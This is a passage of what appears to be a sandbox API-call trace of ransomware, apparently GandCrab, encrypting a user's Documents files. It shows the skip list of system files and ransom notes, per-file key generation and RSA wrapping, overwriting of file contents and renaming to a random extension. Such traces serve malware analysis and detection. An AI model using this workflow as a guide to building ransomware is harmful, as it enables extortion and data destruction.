-1 [0091.087] lstrcmpiW (lpString1="iIXvH.xlsx", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.087] lstrcmpiW (lpString1="iIXvH.xlsx", lpString2="ntldr") returned -1 [0091.087] lstrcmpiW (lpString1="iIXvH.xlsx", lpString2="NTDETECT.COM") returned -1 [0091.087] lstrcmpiW (lpString1="iIXvH.xlsx", lpString2="Bootfont.bin") returned 1 [0091.087] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\iIXvH.xlsx") returned 42 [0091.087] lstrlenW (lpString=".xlsx") returned 5 [0091.087] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.087] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".xlsx ") returned 6 [0091.087] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.088] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.088] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\iIXvH.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\iixvh.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0091.088] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.088] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0091.089] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.089] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.089] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0091.090] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.091] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.091] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.091] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0091.091] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.091] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.091] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.091] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.091] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0091.092] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.092] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.092] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.092] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0091.092] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.092] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.092] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.093] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.093] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0091.093] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.093] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503278) returned 1 [0091.093] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.094] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0091.094] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.094] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0091.094] GetLastError () returned 0x0 [0091.094] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.094] CryptDestroyKey (hKey=0x503278) returned 1 [0091.095] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.095] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.095] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.095] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0091.095] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.095] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503378) returned 1 [0091.096] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.096] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0091.096] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.096] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0091.096] GetLastError () returned 0x0 [0091.096] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.097] CryptDestroyKey (hKey=0x503378) returned 1 [0091.097] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.097] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.097] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0091.097] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0091.097] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x18554, lpOverlapped=0x0) returned 1 [0091.113] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffe7aac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.113] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x18554, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x18554, lpOverlapped=0x0) returned 1 [0091.115] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0091.116] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.121] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.122] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.122] CloseHandle (hObject=0x2ac) returned 1 [0091.123] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\iIXvH.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\iixvh.xlsx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\iIXvH.xlsx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\iixvh.xlsx.titwmvjl"), dwFlags=0x1) returned 1 [0091.123] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.124] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0091.124] lstrcmpW (lpString1="jAgptK-j5gW.docx", lpString2=".") returned 1 [0091.124] lstrcmpW (lpString1="jAgptK-j5gW.docx", lpString2="..") returned 1 [0091.124] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="jAgptK-j5gW.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jAgptK-j5gW.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jAgptK-j5gW.docx" [0091.124] lstrlenW (lpString=".titwmvjl") returned 9 [0091.124] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jAgptK-j5gW.docx") returned 48 [0091.124] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.124] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jAgptK-j5gW.docx.titwmvjl") returned 57 [0091.126] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jAgptK-j5gW.docx") returned 48 [0091.126] lstrlenW (lpString=".docx") returned 5 [0091.126] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.126] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".docx ") returned 6 [0091.126] lstrcmpiW (lpString1=".docx", lpString2=".titwmvjl") returned -1 [0091.126] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.126] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jAgptK-j5gW.docx") returned 48 [0091.126] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jAgptK-j5gW.docx") returned 48 [0091.126] lstrcmpiW (lpString1="jAgptK-j5gW.docx", lpString2="desktop.ini") returned 1 [0091.126] lstrcmpiW (lpString1="jAgptK-j5gW.docx", lpString2="autorun.inf") returned 1 [0091.126] lstrcmpiW (lpString1="jAgptK-j5gW.docx", lpString2="ntuser.dat") returned -1 [0091.126] lstrcmpiW (lpString1="jAgptK-j5gW.docx", lpString2="iconcache.db") returned 1 [0091.126] lstrcmpiW (lpString1="jAgptK-j5gW.docx", lpString2="bootsect.bak") returned 1 [0091.127] lstrcmpiW (lpString1="jAgptK-j5gW.docx", lpString2="boot.ini") returned 1 [0091.127] lstrcmpiW (lpString1="jAgptK-j5gW.docx", lpString2="ntuser.dat.log") returned -1 [0091.127] lstrcmpiW (lpString1="jAgptK-j5gW.docx", lpString2="thumbs.db") returned -1 [0091.127] lstrcmpiW (lpString1="jAgptK-j5gW.docx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0091.127] lstrcmpiW (lpString1="jAgptK-j5gW.docx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0091.127] lstrcmpiW (lpString1="jAgptK-j5gW.docx", lpString2="KRAB-DECRYPT.html") returned -1 [0091.127] lstrcmpiW (lpString1="jAgptK-j5gW.docx", lpString2="CRAB-DECRYPT.html") returned 1 [0091.127] lstrcmpiW (lpString1="jAgptK-j5gW.docx", lpString2="KRAB-DECRYPT.txt") returned -1 [0091.127] lstrcmpiW (lpString1="jAgptK-j5gW.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.127] lstrcmpiW (lpString1="jAgptK-j5gW.docx", lpString2="ntldr") returned -1 [0091.127] lstrcmpiW (lpString1="jAgptK-j5gW.docx", lpString2="NTDETECT.COM") returned -1 [0091.127] lstrcmpiW (lpString1="jAgptK-j5gW.docx", lpString2="Bootfont.bin") returned 1 [0091.127] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jAgptK-j5gW.docx") returned 48 [0091.127] lstrlenW (lpString=".docx") returned 5 [0091.127] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.127] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".docx ") returned 6 [0091.127] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.127] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.128] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jAgptK-j5gW.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\jagptk-j5gw.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0091.128] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.128] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0091.129] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.129] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.129] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0091.130] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.130] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.130] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.131] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0091.131] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.131] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.131] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.131] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.131] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0091.132] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.132] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.132] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.132] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0091.132] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.132] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.133] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.133] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.133] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0091.133] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.134] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503378) returned 1 [0091.134] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.134] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0091.134] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.134] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0091.134] GetLastError () returned 0x0 [0091.134] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.135] CryptDestroyKey (hKey=0x503378) returned 1 [0091.135] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.135] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.135] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.135] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0091.136] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.136] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5035b8) returned 1 [0091.136] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.136] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0091.136] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.136] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0091.137] GetLastError () returned 0x0 [0091.137] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.137] CryptDestroyKey (hKey=0x5035b8) returned 1 [0091.137] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.137] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.137] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0091.138] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0091.138] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x4a1f, lpOverlapped=0x0) returned 1 [0091.151] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffffb5e1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.151] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4a1f, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x4a1f, lpOverlapped=0x0) returned 1 [0091.153] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0091.155] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.158] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.158] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.159] CloseHandle (hObject=0x2ac) returned 1 [0091.159] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jAgptK-j5gW.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\jagptk-j5gw.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jAgptK-j5gW.docx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\jagptk-j5gw.docx.titwmvjl"), dwFlags=0x1) returned 1 [0091.160] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.160] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0091.160] lstrcmpW (lpString1="JXW3nsm.pptx", lpString2=".") returned 1 [0091.160] lstrcmpW (lpString1="JXW3nsm.pptx", lpString2="..") returned 1 [0091.160] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="JXW3nsm.pptx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\JXW3nsm.pptx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\JXW3nsm.pptx" [0091.160] lstrlenW (lpString=".titwmvjl") returned 9 [0091.160] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\JXW3nsm.pptx") returned 44 [0091.160] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.160] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\JXW3nsm.pptx.titwmvjl") returned 53 [0091.161] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\JXW3nsm.pptx") returned 44 [0091.161] lstrlenW (lpString=".pptx") returned 5 [0091.161] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.161] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".pptx ") returned 6 [0091.161] lstrcmpiW (lpString1=".pptx", lpString2=".titwmvjl") returned -1 [0091.161] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.161] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\JXW3nsm.pptx") returned 44 [0091.161] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\JXW3nsm.pptx") returned 44 [0091.161] lstrcmpiW (lpString1="JXW3nsm.pptx", lpString2="desktop.ini") returned 1 [0091.161] lstrcmpiW (lpString1="JXW3nsm.pptx", lpString2="autorun.inf") returned 1 [0091.161] lstrcmpiW (lpString1="JXW3nsm.pptx", lpString2="ntuser.dat") returned -1 [0091.161] lstrcmpiW (lpString1="JXW3nsm.pptx", lpString2="iconcache.db") returned 1 [0091.161] lstrcmpiW (lpString1="JXW3nsm.pptx", lpString2="bootsect.bak") returned 1 [0091.161] lstrcmpiW (lpString1="JXW3nsm.pptx", lpString2="boot.ini") returned 1 [0091.161] lstrcmpiW (lpString1="JXW3nsm.pptx", lpString2="ntuser.dat.log") returned -1 [0091.161] lstrcmpiW (lpString1="JXW3nsm.pptx", lpString2="thumbs.db") returned -1 [0091.161] lstrcmpiW (lpString1="JXW3nsm.pptx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0091.161] lstrcmpiW (lpString1="JXW3nsm.pptx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0091.161] lstrcmpiW (lpString1="JXW3nsm.pptx", lpString2="KRAB-DECRYPT.html") returned -1 [0091.161] lstrcmpiW (lpString1="JXW3nsm.pptx", lpString2="CRAB-DECRYPT.html") returned 1 [0091.161] lstrcmpiW (lpString1="JXW3nsm.pptx", lpString2="KRAB-DECRYPT.txt") returned -1 [0091.161] lstrcmpiW (lpString1="JXW3nsm.pptx", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.161] lstrcmpiW (lpString1="JXW3nsm.pptx", lpString2="ntldr") returned -1 [0091.161] lstrcmpiW (lpString1="JXW3nsm.pptx", lpString2="NTDETECT.COM") returned -1 [0091.161] lstrcmpiW (lpString1="JXW3nsm.pptx", lpString2="Bootfont.bin") returned 1 [0091.161] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\JXW3nsm.pptx") returned 44 [0091.161] lstrlenW (lpString=".pptx") returned 5 [0091.161] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.162] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".pptx ") returned 6 [0091.162] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.162] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.162] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\JXW3nsm.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\jxw3nsm.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0091.162] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.162] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0091.163] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.163] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.163] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0091.164] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.164] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.164] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.164] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0091.164] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.164] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.164] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.164] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.164] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0091.165] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.165] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.165] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.165] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0091.165] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.165] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.165] VirtualFree (lpAddress=0x2420000, 